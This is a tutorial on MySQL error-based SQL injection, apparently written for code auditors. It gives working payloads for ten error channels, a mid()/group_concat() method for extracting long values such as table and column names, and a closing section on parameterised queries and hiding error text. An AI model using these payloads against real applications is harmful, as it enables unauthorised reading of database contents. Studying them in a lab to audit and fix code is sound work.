Error-based injection, which makes the database print data inside its own error message, is used in many intrusions. It has one limitation: the page has to echo database errors. In code audits we frequently find SQL injection points that do not echo query results at all; there, error-based injection is the fastest way to get data out, provided the error text reaches the response.

The oldest and most widely used variant is the data-type conversion error, mostly on Microsoft SQL Server through convert() and cast(). MySQL offers more error channels than that. Most people believe there are only three, the functions floor(), updatexml() and extractvalue(), but a number of other functions also make MySQL raise an error that carries data: GeometryCollection(), polygon(), GTID_SUBSET(), multipoint(), multilinestring(), multipolygon(), LINESTRING() and exp(). Their concrete usage follows. Note that these methods are not universal across versions: some older releases lack the functions, and whether the error text includes the injected value depends on the server version, so check version() on the target first.

Most injectable statements look like select * from phpsec where id=? (where ? stands for the injected value), so that form is used throughout. The techniques are as follows.
1. floor()
Injection payload:
id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
The error returned after the SQL statement executes is shown in the figure.
The screenshot shows that MySQL errored out and printed the current connection user. The trick relies on rand(0) being seeded, so floor(rand(0)*2) produces the same 0, 1, 1, 0, 1, 1 sequence every time, and on GROUP BY evaluating the key expression twice when it inserts a new group, which produces a duplicate key once the source table has at least three rows.
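The following is an added example, not code from the original page: a small MySQL lab that reproduces the floor() error and shows why the payload is built the way it is. The schema phpsec_lab, the phpsec table and its two rows are assumptions created here, and the connection user is assumed to be root@localhost as in the page's screenshots. Run it in the mysql client; the final statement is meant to fail.

```sql
-- Added example, not from the original page. The scratch schema and table are assumptions created here.
CREATE DATABASE IF NOT EXISTS phpsec_lab;
USE phpsec_lab;
DROP TABLE IF EXISTS phpsec;
CREATE TABLE phpsec (id INT PRIMARY KEY, name VARCHAR(32));
-- The WHERE clause is only evaluated against existing rows, so the table must not be empty.
INSERT INTO phpsec VALUES (1, 'alice'), (2, 'bob');

-- Why rand(0): the seeded generator returns the same sequence on every run,
-- so floor(rand(0)*2) yields 0, 1, 1, 0, 1, 1, ... An unseeded rand() errors only sometimes.
SELECT floor(rand(0)*2) AS k FROM information_schema.tables LIMIT 6;

-- Why it errors: GROUP BY keeps groups in a temporary table with a unique key, and
-- re-evaluates the key expression when it inserts a new group. Row 1 looks up key
-- '...0', misses, and inserts '...1'; row 2 looks up '...1' and hits; row 3 looks up
-- '...0', misses, and tries to insert '...1' a second time. So the FROM source needs
-- at least three rows; information_schema.tables always has them.
-- The page's payload written out as the full statement the vulnerable code executes:
SELECT * FROM phpsec WHERE id=1 AND (
  SELECT 1 FROM (
    SELECT count(*), concat(user(), floor(rand(0)*2)) x
    FROM information_schema.tables
    GROUP BY x
  ) a
);
-- Expected on MySQL 5.x: ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
```

To leak something other than the user, replace user() with any single-row expression such as (select database()) or a mid() slice of a group_concat(); the value appears in the duplicate key immediately before the trailing 0 or 1 digit.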
2. extractvalue()
Injection payload:
id = 1 and (extractvalue(1, concat(0x5c, (select user()))))
The error message is shown in the figure (0x5c is a backslash, so on a typical setup it reads XPATH syntax error: '\root@localhost').
3. updatexml()
Injection payload:
id = 1 AND (updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Error message:
[Err] 1105 - XPATH syntax error: '^$root@localhost^$'
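The following is an added example, not code from the original page, for both the extractvalue() and updatexml() channels: an XPATH syntax error prints at most 32 characters of the offending expression, so longer values have to be read in slices. It assumes the phpsec_lab schema and non-empty phpsec table used in the floor() example above (any non-empty table works).

```sql
-- Added example, not from the original page. Assumes schema phpsec_lab with a non-empty table phpsec.
USE phpsec_lab;

-- 0x7e is '~', never valid XPath, so the expression always fails to parse and the error
-- prints it back (the page's 0x5c, a backslash, works the same way). The message shows
-- at most 32 characters including the '~', so each request yields 31 characters of data.
SELECT * FROM phpsec WHERE id=1 AND extractvalue(1, concat(0x7e, (SELECT version())));
-- ERROR 1105 (HY000): XPATH syntax error: '~5.7.44'   (version string varies by server)

-- Long values: gather them with group_concat() and read 31-character slices with mid().
-- Slice 1: characters 1..31
SELECT * FROM phpsec WHERE id=1 AND extractvalue(1, concat(0x7e,
  mid((SELECT group_concat(table_name) FROM information_schema.tables
       WHERE table_schema = database()), 1, 31)));
-- Slice 2: characters 32..62; keep going until a slice comes back shorter than 31 characters.
SELECT * FROM phpsec WHERE id=1 AND extractvalue(1, concat(0x7e,
  mid((SELECT group_concat(table_name) FROM information_schema.tables
       WHERE table_schema = database()), 32, 31)));

-- updatexml() is the same channel with the same 32-character limit; note the third argument.
SELECT * FROM phpsec WHERE id=1 AND updatexml(1, concat(0x7e,
  mid((SELECT group_concat(column_name) FROM information_schema.columns
       WHERE table_schema = database() AND table_name = 'phpsec'), 1, 31)), 1);
-- ERROR 1105 (HY000): XPATH syntax error: '~id,name'
```

In the lab schema the first table slice is just '~phpsec', which is shorter than 31 characters, so one request is enough; against a real schema the same two statements are repeated with the mid() offset advanced by 31 each time.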
4. GeometryCollection()
The geometry constructors below expect geometry arguments; handed a non-geometric subquery value they raise error 1367, and the message quotes the expression with the subquery folded to its result, which is what leaks the data.
Injection payload:
id = 1 AND GeometryCollection((select * from(select * from(select user())a)b))
Error message:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
5. polygon()
Injection payload:
id = 1 AND polygon((select * from(select * from(select user())a)b))
Error message:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
6. multipoint()
Injection payload:
id = 1 AND multipoint((select * from(select * from(select user())a)b))
Error message:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
7. multilinestring()
Injection payload:
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
Error message:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
8. multipolygon()
Injection payload:
id = 1 AND multipolygon((select * from(select * from(select user())a)b))
Error message:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
9. linestring()
Injection payload:
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
Error message:
[Err] 1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
10. exp()
Bitwise NOT of the string subquery yields the largest unsigned BIGINT, and exp() of that overflows DOUBLE; the out-of-range error quotes the expression with the subquery folded to its value.
Injection payload:
id = 1 and EXP(~(SELECT*from(SELECT user())a))
Error message:
[Err] 1690 - DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
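The following is an added example, not code from the original page: the same payload run once through string-spliced SQL and once through a bound parameter, to make the root cause of every technique above, and the fix, concrete. It assumes the phpsec_lab schema and phpsec table from the earlier examples.

```sql
-- Added example, not from the original page. Assumes schema phpsec_lab with a non-empty table phpsec.
USE phpsec_lab;
SET @input = '1 and extractvalue(1, concat(0x7e, (select user())))';

-- Vulnerable: the input becomes part of the SQL text, exactly like "select * from phpsec where id=$id"
-- in application code. The server parses the payload and the error leaks user().
SET @sql = concat('SELECT * FROM phpsec WHERE id=', @input);
PREPARE spliced FROM @sql;
EXECUTE spliced;            -- ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'
DEALLOCATE PREPARE spliced;

-- Hardened: the input is bound as a value and never parsed as SQL. The string is coerced to
-- the number 1 with a "Truncated incorrect DOUBLE value" warning, so the id=1 row is returned
-- and nothing inside the payload is executed.
PREPARE bound FROM 'SELECT * FROM phpsec WHERE id=?';
EXECUTE bound USING @input;
DEALLOCATE PREPARE bound;
```

Binding removes the injection; the other half of the fix is to stop forwarding database error text to the client at all, since every channel on this page depends on it. Log errors server-side and return a generic message.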